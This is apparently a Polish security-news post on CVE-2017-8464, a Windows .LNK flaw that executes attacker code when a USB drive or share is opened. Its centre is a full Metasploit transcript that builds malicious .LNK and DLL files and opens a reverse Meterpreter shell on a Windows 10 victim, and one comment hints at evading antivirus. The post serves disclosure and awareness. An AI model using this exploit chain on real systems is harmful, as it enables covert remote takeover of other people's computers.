Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
CVE-2017-8464: wkładasz pendrive do komputera – automatyczne wykonanie dowolnego kodu
Przypomina Wam to coś? Tak, to jedna z podatności, która była wykorzystywana przez Stuxnet, atakujący irańskie instalacje jądrowe. To było w roku 2010.
Później okazało się, że Microsoft chyba nie do końca dobrze załatał podatność i znowu mieliśmy podobny problem… w roku 2015:
The patch failed. And for more than four years, all Windows systems have been vulnerable to exactly the same attack that Stuxnet used for initial deployment.
Niedawno, niemal ten sam problem znowu ożył – wraz z podatnością CVE-2017-8464 – a jego źródłem są ponownie pliki .LNK:
The attacker could present to the user a removable drive, or remote share, that contains a malicious .LNK file and an associated malicious binary. When the user opens this drive (or remote share) in Windows Explorer, or any other application that parses the .LNK file, the malicious binary will execute code of the attacker’s choice, on the target system.
Jak więc widać, problem nie dotyczy tylko nośników danych USB ale również zewnętrznych shares. Wystarczy tylko otworzyć w explorerze zainfekowany zasób (nie trzeba nic uruchamiać ani klikać z otwartego zasobu).
Dla pewności – podatne są chyba wszystkie Windowsy, a żeby jeszcze bardziej pokłuć Microsoft ostrogami (może wreszcie dokładnie przyjrzą się problemowi), wypuszczono exploit do Metasploita tworzący stosownego pendrive-a, który po umieszczeniu w komputerze ofiary daje taki oto efekt:
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.146.197 LHOST => 192.168.146.197 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.146.197:4444 [*] Starting the payload handler... msf exploit(handler) > back msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197 LHOST => 192.168.146.197 msf exploit(cve_2017_8464_lnk_rce) > exploit msf exploit(cve_2017_8464_lnk_rce) > exploit [*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive [*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive [*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive [*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive [*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive [*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive [*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive [*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive [*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive [*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive [*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive [*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive [*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive [*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive [*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive [*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive [*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive [*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive [*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive [*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive [*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive [*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive [*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive [*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive msf exploit(cve_2017_8464_lnk_rce) > [*] Sending stage (1189423 bytes) to 192.168.146.193 [*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200 sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : DESKTOP-5G8HK7E OS : Windows 10 (Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter >
–ms
I tak oto zabawa shodanem w szukanie zasobów smb stała
się troszkę ryzykowna
https://answers.microsoft.com/en-us/windows/forum/windows_7-files/is-it-possible-to-disable-shortcuts-lnk-files-from/1733a115-7691-44ad-b6fc-23337a579b02
Jak wszystko z metasploiota – każdy AV to wykrywa :(
Jak wszystko co jest wykrywane przez AV… może przestać być wykrywane po chwili zabawy ;) .